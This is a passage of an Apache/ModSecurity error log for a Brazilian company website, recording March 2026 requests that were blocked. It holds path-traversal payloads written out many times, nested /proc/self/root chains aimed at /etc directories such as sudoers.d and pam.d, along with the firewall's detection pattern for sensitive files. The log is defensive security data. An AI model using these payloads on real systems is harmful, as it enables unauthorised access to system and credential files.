[Tue Mar 17 16:19:20.519562 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.241.31:41960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpOKt8Nd0UC_OcbVHXXAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:21.832603 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:41972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpOda6ubjKNq_cu4YWXwAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:23.509118 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:41976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpO_PqhzTj3BvfDX-VhAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:24.871998 2026] [:error] [pid 7004:tid 140411699963648] [client 74.7.241.31:41984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpPMU6Sx0TG1YjmQi8cQAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:26.277573 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:41990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpPta6ubjKNq_cu4YWYQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:28.830064 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:57026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpQNY0UrI5A3LftIwLEwAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:30.137964 2026] [:error] [pid 25836:tid 140411708356352] [client 74.7.241.31:57040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpQoh-PF_25v4hFRB44gAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:30.236135 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.228.61:49326] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmpQqBJNF7axNlVR0UmeAAAAAQ"]
[Tue Mar 17 16:19:31.473236 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:57054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpQ_PqhzTj3BvfDX-VhwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:32.093869 2026] [proxy_fcgi:error] [pid 7004:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57006] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:19:33.409390 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:57068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpRXIk7brgkOH-rIWZ1QAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:34.726007 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.241.31:57072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpRqt8Nd0UC_OcbVHXYAAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:36.205585 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:57082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpSIh-PF_25v4hFRB44wAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:37.543268 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:42494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpSQeiSKl8TjouI-Yl-AAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:38.898127 2026] [:error] [pid 29151:tid 140411733534464] [client 74.7.241.31:42504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpSvPqhzTj3BvfDX-ViwAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:40.254611 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:42514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpTNa6ubjKNq_cu4YWYgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:42.971405 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:42526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpTtY0UrI5A3LftIwLHQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:43.127164 2026] [:error] [pid 2598:tid 140411725141760] [client 74.7.243.128:52386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpTxj0p0SRWAqcjGGHjgAAAwI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:19:44.282960 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:42528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpUIh-PF_25v4hFRB45gAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:44.434568 2026] [:error] [pid 29151:tid 140411565680384] [client 74.7.243.128:33028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpUPPqhzTj3BvfDX-VjQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:19:46.206793 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:33044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpUta6ubjKNq_cu4YWYwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:46.207455 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.31:42542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpUa4xEDsg_V3ESNZZRgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:47.604045 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:50486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpU4h-PF_25v4hFRB47AAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:48.914789 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:50502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 